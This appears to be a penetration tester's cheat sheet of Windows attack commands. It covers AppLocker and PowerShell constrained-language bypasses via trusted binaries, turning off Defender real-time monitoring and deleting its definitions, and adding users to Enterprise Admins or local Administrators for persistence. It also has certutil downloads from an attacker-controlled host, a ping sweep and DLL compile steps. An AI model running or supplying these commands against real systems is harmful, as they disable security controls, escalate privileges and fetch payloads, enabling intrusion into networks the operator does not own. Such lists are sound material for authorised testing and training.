% lolbin

# applocker bypass
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe run.xml results.xml

# applocker powershell CLM bypass
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass.exe

# disable defender antivirus
Set-MpPreference -DisableRealtimeMonitoring $true
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

# forest enterprise privesc
net group "Enterprise Admins" /add /domain

# windows /etc/hosts
type c:\Windows\System32\Drivers\etc\hosts

# permissions
icacls C:\<FOLDER>

# tree
tree /F

# change password (domain)
net user <DOMAIN_USER> Password1234 /domain

# add local admin (persistence)
net user <USERNAME> <PASSWORD> /add
net localgroup Administrators <USERNAME> /add
net localgroup "Remote Management Users" <USERNAME> /add

# download
certutil -urlcache -split -f http://<LHOST>/<FILE>
certutil -urlcache -split -f http://<LHOST>:8000/<FILE>

# ping sweep host discovery eg. replace subnet with 10.0.0
1..254 | % {"<SUBNET>.$($_): $(Test-Connection -count 1 -comp <SUBNET>.$($_) -quiet)"}

# compile dll c
%comspec% /k "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
cl.exe /D_USRDLL /D_WINDLL /LD dll.c /link /DLL /OUT:mono.dll

# compile dll cpp for release /02
%comspec% /k "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
cl /LD /EHsc /O2 example_dll.cpp

# compile exe c
%comspec% /k "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
cl /O2 /W4 /TC hello.c

# compile exe cpp
%comspec% /k "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
cl /O2 /W4 hello.c

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
